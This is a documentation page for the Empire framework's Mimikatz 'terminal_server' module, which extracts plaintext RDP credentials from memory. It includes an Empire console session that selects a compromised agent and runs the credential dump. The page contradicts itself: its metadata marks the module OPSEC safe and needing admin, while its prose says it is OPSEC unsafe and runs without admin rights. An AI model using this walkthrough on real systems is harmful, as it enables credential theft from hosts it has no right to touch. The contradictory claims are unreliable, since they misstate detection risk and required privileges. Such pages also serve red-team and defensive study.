Invoke-Mimikatz Dump Terminal Server Passwords - Empire Module

This page contains detailed information about how to use the powershell/credentials/mimikatz/terminal_server Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: Invoke-Mimikatz Dump Terminal Server Passwords
Module: powershell/credentials/mimikatz/terminal_server
Source code [1]: empire/server/modules/powershell/credentials/mimikatz/terminal_server.yaml
Source code [2]: empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1
MITRE ATT&CK: T1003, T1081, S0002
Language: PowerShell
Needs admin: Yes
OPSEC safe: Yes
Background: Yes

The terminal_server module runs PowerSploit's Invoke-Mimikatz function to extract plaintext RDP credentials from memory.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the terminal_server module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the terminal_server module:

Agent
Agent to run module on.

Terminal_server Example Usage

---

Here's an example of how to use the terminal_server module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/mimikatz/terminal_server

 Author       @JosephBialek                                                        
              @gentilkiwi                                                          
 Background   True                                                                 
 Comments     https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210531   
              https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from- 
              svchost-exe/                                                         
 Description  Runs PowerSploit's Invoke-Mimikatz function to extract plaintext RDP 
              credentials from memory.                                             
 Language     powershell                                                           
 Name         powershell/credentials/mimikatz/terminal_server                      
 NeedsAdmin   True                                                                 
 OpsecSafe    True                                                                 
 Software     http://attack.mitre.org/software/S0002                               
 Techniques   http://attack.mitre.org/techniques/T1003                             
              http://attack.mitre.org/techniques/T1081                             


,Record Options-,----------,-------------------------,
| Name  | Value | Required | Description             |
|-------|-------|----------|-------------------------|
| Agent |       | True     | Agent to run module on. |
'-------'-------'----------'-------------------------'

(Empire: usemodule/powershell/credentials/mimikatz/terminal_server) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/mimikatz/terminal_server) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors

---

• @JosephBialek
• @gentilkiwi

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/credentials/mimikatz/terminal_server.yaml
• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1
• https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210531
• https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
• http://attack.mitre.org/software/S0002
• http://attack.mitre.org/techniques/T1003
• http://attack.mitre.org/techniques/T1081
• http://blog.gentilkiwi.com
• http://creativecommons.org/licenses/by/3.0/fr/
• https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection
• http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
• http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html
• http://www.exploit-monday.com/
• http://msdn.microsoft.com/en-us/magazine/cc301808.aspx

See Also

---

Check also the following modules related to this module:

• powershell/credentials/mimikatz/pth
• powershell/credentials/mimikatz/silver_ticket
• powershell/credentials/mimikatz/cache
• powershell/credentials/mimikatz/command
• powershell/credentials/mimikatz/extract_tickets
• powershell/credentials/mimikatz/keys
• powershell/credentials/mimikatz/sam
• powershell/credentials/mimikatz/trust_keys
• powershell/credentials/mimikatz/purge
• powershell/credentials/mimikatz/logonpasswords
• powershell/credentials/mimikatz/certs
• powershell/credentials/mimikatz/dcsync
• powershell/credentials/mimikatz/lsadump
• powershell/credentials/mimikatz/mimitokens
• powershell/credentials/mimikatz/golden_ticket
• powershell/credentials/mimikatz/dcsync_hashdump
• powershell/recon/get_sql_server_login_default_pw
• powershell/situational_awareness/network/get_sql_server_info
• python/situational_awareness/network/active_directory/get_fileservers
• powershell/situational_awareness/network/powerview/get_fileserver
• powershell/situational_awareness/host/dnsserver

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.